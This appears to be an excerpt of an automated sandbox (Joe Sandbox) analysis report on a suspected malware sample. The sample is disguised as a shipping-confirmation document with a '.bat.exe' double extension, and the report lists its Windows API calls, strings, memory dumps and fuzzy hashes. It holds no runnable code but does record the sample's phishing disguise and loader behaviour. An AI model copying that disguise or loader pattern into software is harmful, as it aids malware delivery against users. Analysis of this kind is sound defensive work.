                                                                              • Part of subcall function 00404EAE: lstrlenW.KERNEL32(00422F48,00422F48,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F4F
                                                                              • Part of subcall function 00404EAE: wsprintfW.USER32 ref: 00404F58
                                                                              • Part of subcall function 00404EAE: SetDlgItemTextW.USER32(?,00422F48), ref: 00404F6B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                            • String ID: A$C:\Users\user\eftermodnendes\ringeagt$Call$H/B$user32::EnumWindows(i r1 ,i 0)
                                                                            • API String ID: 2624150263-772280193
                                                                            • Opcode ID: 4cf00c73115f53cf57be461a99467e832b164710fce0f00c931b90381e9749c6
                                                                            • Instruction ID: 96009b05525636a0bc85a96efb184481c484ec56fefee2337862baa2afa4bf02
                                                                            • Opcode Fuzzy Hash: 4cf00c73115f53cf57be461a99467e832b164710fce0f00c931b90381e9749c6
                                                                            • Instruction Fuzzy Hash: DDA173B1900209ABDB11AFA5CD45AEFB7B8EF84314F11843BF601B62D1D77C99418B6D
                                                                            APIs
                                                                              • Part of subcall function 733B12BB: GlobalAlloc.KERNELBASE(00000040,?,733B12DB,?,733B137F,00000019,733B11CA,-000000A0), ref: 733B12C5
                                                                            • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 733B1D2D
                                                                            • lstrcpyW.KERNEL32(00000008,?), ref: 733B1D75
                                                                            • lstrcpyW.KERNEL32(00000808,?), ref: 733B1D7F
                                                                            • GlobalFree.KERNEL32(00000000), ref: 733B1D92
                                                                            • GlobalFree.KERNEL32(?), ref: 733B1E74
                                                                            • GlobalFree.KERNEL32(?), ref: 733B1E79
                                                                            • GlobalFree.KERNEL32(?), ref: 733B1E7E
                                                                            • GlobalFree.KERNEL32(00000000), ref: 733B2068
                                                                            • lstrcpyW.KERNEL32(?,?), ref: 733B2222
                                                                            • GetModuleHandleW.KERNEL32(00000008), ref: 733B22A1
                                                                            • LoadLibraryW.KERNEL32(00000008), ref: 733B22B2
                                                                            • GetProcAddress.KERNEL32(?,?), ref: 733B230C
                                                                            • lstrlenW.KERNEL32(00000808), ref: 733B2326
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2155284752.00000000733B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 733B0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2155172212.00000000733B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2155846609.00000000733B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2155909402.00000000733B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_733b0000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                            • String ID:
                                                                            • API String ID: 245916457-0
                                                                            • Opcode ID: 665d989e5a4804686fca5b9b9b66efccadee848bd098d616637f347a98f89709
                                                                            • Instruction ID: df921053ae34f3638438db2e5a206ab6d63d4d3e440e35a2d8797c8928e111c0
                                                                            • Opcode Fuzzy Hash: 665d989e5a4804686fca5b9b9b66efccadee848bd098d616637f347a98f89709
                                                                            • Instruction Fuzzy Hash: F3229C71D00249DFDB318FA4C980BEEB7BAFB08315F14462ED1A6E6A94D77C9681CB50
                                                                            APIs
                                                                            • CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040222E
                                                                            Strings
                                                                            • C:\Users\user\eftermodnendes\ringeagt, xrefs: 0040226E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID: CreateInstance
                                                                            • String ID: C:\Users\user\eftermodnendes\ringeagt
                                                                            • API String ID: 542301482-1820855999
                                                                            • Opcode ID: 5b0014f3340ed2e8e047bae132ec64f51d2c526b3404a8b2a52325da7d94e0b0
                                                                            • Instruction ID: 6031f0b9305bb7b05064ab4f17c9904609ff1c452577966f293784d012f03e0b
                                                                            • Opcode Fuzzy Hash: 5b0014f3340ed2e8e047bae132ec64f51d2c526b3404a8b2a52325da7d94e0b0
                                                                            • Instruction Fuzzy Hash: 4A410475A00209AFCB40DFE4C989EAD7BB5BF48308B20457EF505EB2D1DB799982CB54
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID: FileFindFirst
                                                                            • String ID:
                                                                            • API String ID: 1974802433-0
                                                                            • Opcode ID: 209a06d9c3b4454fc5c1ff69253149a6aac46e41fe78177cd59690df36c1804c
                                                                            • Instruction ID: f0d7266373870d470beff65cac24d35b4a218527411e0b80208e5fb1e93adf0c
                                                                            • Opcode Fuzzy Hash: 209a06d9c3b4454fc5c1ff69253149a6aac46e41fe78177cd59690df36c1804c
                                                                            • Instruction Fuzzy Hash: 28F08271A04104AED701EBE4ED499AEB378EF14314F60057BE111F31E0D7B84E059B19
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,000003F9), ref: 00405086
                                                                            • GetDlgItem.USER32(?,00000408), ref: 00405091
                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 004050DB
                                                                            • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 004050F2
                                                                            • SetWindowLongW.USER32(?,000000FC,0040567B), ref: 0040510B
                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 0040511F
                                                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00405131
                                                                            • SendMessageW.USER32(?,00001109,00000002), ref: 00405147
                                                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405153
                                                                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405165
                                                                            • DeleteObject.GDI32(00000000), ref: 00405168
                                                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405193
                                                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 0040519F
                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040523A
                                                                            • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040526A
                                                                              • Part of subcall function 00404636: SendMessageW.USER32(00000028,?,00000001,00404461), ref: 00404644
                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040527E
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 004052AC
                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004052BA
                                                                            • ShowWindow.USER32(?,00000005), ref: 004052CA
                                                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 004053C5
                                                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040542A
                                                                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0040543F
                                                                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405463
                                                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405483
                                                                            • ImageList_Destroy.COMCTL32(?), ref: 00405498
                                                                            • GlobalFree.KERNEL32(?), ref: 004054A8
                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405521
                                                                            • SendMessageW.USER32(?,00001102,?,?), ref: 004055CA
                                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004055D9
                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00405604
                                                                            • ShowWindow.USER32(?,00000000), ref: 00405652
                                                                            • GetDlgItem.USER32(?,000003FE), ref: 0040565D
                                                                            • ShowWindow.USER32(00000000), ref: 00405664
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                            • String ID: $M$N
                                                                            • API String ID: 2564846305-813528018
                                                                            • Opcode ID: 324c1f4819b082b1ac23898fd696f3744d7b458a05ce4ad4b76fe224fda76cd4
                                                                            • Instruction ID: 3eec0fee992af157883e3c32035e614d90e83c27d9cb298499668aae57dc4bf7
                                                                            • Opcode Fuzzy Hash: 324c1f4819b082b1ac23898fd696f3744d7b458a05ce4ad4b76fe224fda76cd4
                                                                            • Instruction Fuzzy Hash: B4029D70A00608EFDB20DF64CD45AAF7BB5FB44314F10857AE910BA2E0D7B98A42DF18
                                                                            APIs
                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 0040413E
                                                                            • ShowWindow.USER32(?), ref: 0040415E
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00404170
                                                                            • ShowWindow.USER32(?,00000004), ref: 00404189
                                                                            • DestroyWindow.USER32 ref: 0040419D
                                                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 004041B6
                                                                            • GetDlgItem.USER32(?,?), ref: 004041D5
                                                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041E9
                                                                            • IsWindowEnabled.USER32(00000000), ref: 004041F0
                                                                            • GetDlgItem.USER32(?,00000001), ref: 0040429B
                                                                            • GetDlgItem.USER32(?,00000002), ref: 004042A5
                                                                            • SetClassLongW.USER32(?,000000F2,?), ref: 004042BF
                                                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404310
                                                                            • GetDlgItem.USER32(?,00000003), ref: 004043B6
                                                                            • ShowWindow.USER32(00000000,?), ref: 004043D7
                                                                            • EnableWindow.USER32(?,?), ref: 004043E9
                                                                            • EnableWindow.USER32(?,?), ref: 00404404
                                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040441A
                                                                            • EnableMenuItem.USER32(00000000), ref: 00404421
                                                                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404439
                                                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040444C
                                                                            • lstrlenW.KERNEL32(00422F48,?,00422F48,00000000), ref: 00404476
                                                                            • SetWindowTextW.USER32(?,00422F48), ref: 0040448A
                                                                            • ShowWindow.USER32(?,0000000A), ref: 004045BE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Item$MessageSendShow$EnableLong$Menu$ClassDestroyEnabledSystemTextlstrlen
                                                                            • String ID: H/B
                                                                            • API String ID: 1860320154-184950203
                                                                            • Opcode ID: 6713c34f0db6ca24ad0fd02f4a6c26255f157c0ea2add66a7142b4456e47287b
                                                                            • Instruction ID: f8b0abefa6079376cca3afd4ac47b8e6787ccd0873a3a79b8952b84eeba681b3
                                                                            • Opcode Fuzzy Hash: 6713c34f0db6ca24ad0fd02f4a6c26255f157c0ea2add66a7142b4456e47287b
                                                                            • Instruction Fuzzy Hash: 91C1CFB1600204BBDB316F61EE85A2B7AB8EB85345F41053EF741B25F0CB795842DB2D
                                                                            APIs
                                                                            • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040485E
                                                                            • GetDlgItem.USER32(?,000003E8), ref: 00404872
                                                                            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040488F
                                                                            • GetSysColor.USER32(?), ref: 004048A0
                                                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004048AE
                                                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004048BC
                                                                            • lstrlenW.KERNEL32(?), ref: 004048C1
                                                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004048CE
                                                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048E3
                                                                            • GetDlgItem.USER32(?,0000040A), ref: 0040493C
                                                                            • SendMessageW.USER32(00000000), ref: 00404943
                                                                            • GetDlgItem.USER32(?,000003E8), ref: 0040496E
                                                                            • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004049B1
                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 004049BF
                                                                            • SetCursor.USER32(00000000), ref: 004049C2
                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 004049DB
                                                                            • SetCursor.USER32(00000000), ref: 004049DE
                                                                            • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404A0D
                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404A1F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                            • String ID: 7G@$Call$N
                                                                            • API String ID: 3103080414-3155595626
                                                                            • Opcode ID: b6dc2905c6216746abb3c0cd17d9c39e8b2e61a9098f8b336cb1d1698ee7a258
                                                                            • Instruction ID: cd0ff63a31a53d86839c1a5ce07a34679cc09665db384d3569e6db54912acae5
                                                                            • Opcode Fuzzy Hash: b6dc2905c6216746abb3c0cd17d9c39e8b2e61a9098f8b336cb1d1698ee7a258
                                                                            • Instruction Fuzzy Hash: 9061B0B1A40209BFDB10AF64CD85EAA7B69FB84305F00843AF605B72D0D779AD51CF98
                                                                            APIs
                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406463,?,?), ref: 00406303
                                                                            • GetShortPathNameW.KERNEL32(?,004265E8,00000400), ref: 0040630C
                                                                              • Part of subcall function 004060D7: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063BC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060E7
                                                                              • Part of subcall function 004060D7: lstrlenA.KERNEL32(00000000,?,00000000,004063BC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406119
                                                                            • GetShortPathNameW.KERNEL32(?,00426DE8,00000400), ref: 00406329
                                                                            • wsprintfA.USER32 ref: 00406347
                                                                            • GetFileSize.KERNEL32(00000000,00000000,00426DE8,C0000000,00000004,00426DE8,?,?,?,?,?), ref: 00406382
                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406391
                                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063C9
                                                                            • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004261E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 0040641F
                                                                            • GlobalFree.KERNEL32(00000000), ref: 00406430
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406437
                                                                              • Part of subcall function 00406172: GetFileAttributesW.KERNELBASE(00000003,00403118,C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe,80000000,00000003), ref: 00406176
                                                                              • Part of subcall function 00406172: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406198
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                            • String ID: %ls=%ls$[Rename]$eB$mB$mB
                                                                            • API String ID: 2171350718-2529913679
                                                                            • Opcode ID: db523023045b127196975f0173c88122861a3a00dd6e7a8812d5311d7169504c
                                                                            • Instruction ID: 393dc7f902851ea198dcc63c4c4a9d42cf85fc1b4335f85fcc59b0ede2066cac
                                                                            • Opcode Fuzzy Hash: db523023045b127196975f0173c88122861a3a00dd6e7a8812d5311d7169504c
                                                                            • Instruction Fuzzy Hash: 35313571600325BBD2206B29AD49F6B3A6CDF41744F17003AF902F62D3DA7CD82686BC
                                                                            APIs
                                                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                            • DeleteObject.GDI32(?), ref: 004010ED
                                                                            • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                            • DrawTextW.USER32(00000000,00428A60,000000FF,00000010,00000820), ref: 00401156
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                            • DeleteObject.GDI32(?), ref: 00401165
                                                                            • EndPaint.USER32(?,?), ref: 0040116E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                            • String ID: F
                                                                            • API String ID: 941294808-1304234792
                                                                            • Opcode ID: 9a1d1952d02a6587733a796de720c08d05f060e36ce2c67ddab1b612aed24319
                                                                            • Instruction ID: 3c33d73dbc2ffdf14e434cca4ae815e9cfbd561affca8d3971a90777bf4c3be5
                                                                            • Opcode Fuzzy Hash: 9a1d1952d02a6587733a796de720c08d05f060e36ce2c67ddab1b612aed24319
                                                                            • Instruction Fuzzy Hash: 34418B71800249AFCF058FA5DE459AFBBB9FF45314F00802EF592AA1A0CB34DA55DFA4
                                                                            APIs
                                                                            • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 00406993
                                                                            • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004069A2
                                                                            • CharNextW.USER32(?,"C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 004069A7
                                                                            • CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 004069BA
                                                                            Strings
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00406931
                                                                            • "C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe", xrefs: 00406974
                                                                            • *?|<>/":, xrefs: 00406982
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
